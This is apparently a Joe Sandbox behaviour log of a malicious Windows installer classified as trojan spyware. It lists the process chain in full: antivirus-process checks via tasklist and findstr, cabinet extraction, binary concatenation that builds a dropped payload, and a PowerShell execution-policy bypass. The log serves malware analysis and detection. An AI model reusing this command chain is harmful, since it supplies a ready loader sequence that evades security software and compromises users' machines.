      Source: C:\Users\user\Desktop\!Setup.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
      Source: C:\Users\user\Desktop\!Setup.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_004038AF
      Source: C:\Users\user\Desktop\!Setup.exeFile created: C:\Windows\OnceBusinessesJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeFile created: C:\Windows\BuysGothicJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeFile created: C:\Windows\RdBelievesJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeFile created: C:\Windows\HierarchyConstantlyJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeCode function: 0_2_0040737E0_2_0040737E
      Source: C:\Users\user\Desktop\!Setup.exeCode function: 0_2_00406EFE0_2_00406EFE
      Source: C:\Users\user\Desktop\!Setup.exeCode function: 0_2_004079A20_2_004079A2
      Source: C:\Users\user\Desktop\!Setup.exeCode function: 0_2_004049A80_2_004049A8
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
      Source: C:\Users\user\Desktop\!Setup.exeCode function: String function: 004062CF appears 58 times
      Source: !Setup.exeStatic PE information: invalid certificate
      Source: !Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@29/28@3/2
      Source: C:\Users\user\Desktop\!Setup.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
      Source: C:\Users\user\Desktop\!Setup.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
      Source: C:\Users\user\Desktop\!Setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\ScoutJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2364:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
      Source: C:\Users\user\Desktop\!Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsk94C6.tmpJump to behavior
      Source: !Setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Users\user\Desktop\!Setup.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: !Setup.exeReversingLabs: Detection: 27%
      Source: !Setup.exeVirustotal: Detection: 16%
      Source: C:\Users\user\Desktop\!Setup.exeFile read: C:\Users\user\Desktop\!Setup.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\!Setup.exe "C:\Users\user\Desktop\!Setup.exe"
      Source: C:\Users\user\Desktop\!Setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Campaigns Campaigns.cmd & Campaigns.cmd
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 71992
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Ec
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Ratio" Returning
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 71992\Banned.com + Fwd + Rise + Designed + Balanced + Available + Dir + Soccer + Race + Ford + Writing 71992\Banned.com
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Bids + ..\Ceo + ..\Throat + ..\Hall + ..\Access + ..\Availability + ..\Scout + ..\War V
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Banned.com V
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\!Setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Campaigns Campaigns.cmd & Campaigns.cmdJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 71992Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E EcJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Ratio" Returning Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 71992\Banned.com + Fwd + Rise + Designed + Balanced + Available + Dir + Soccer + Race + Ford + Writing 71992\Banned.comJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Bids + ..\Ceo + ..\Throat + ..\Hall + ..\Access + ..\Availability + ..\Scout + ..\War VJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Banned.com VJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1"Jump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: wsock32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: !Setup.exeStatic file information: File size 14692191 > 1048576
      Source: !Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\!Setup.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328

      Persistence and Installation Behavior

      barindex
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comJump to dropped file
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comJump to dropped file
      Source: C:\Users\user\Desktop\!Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
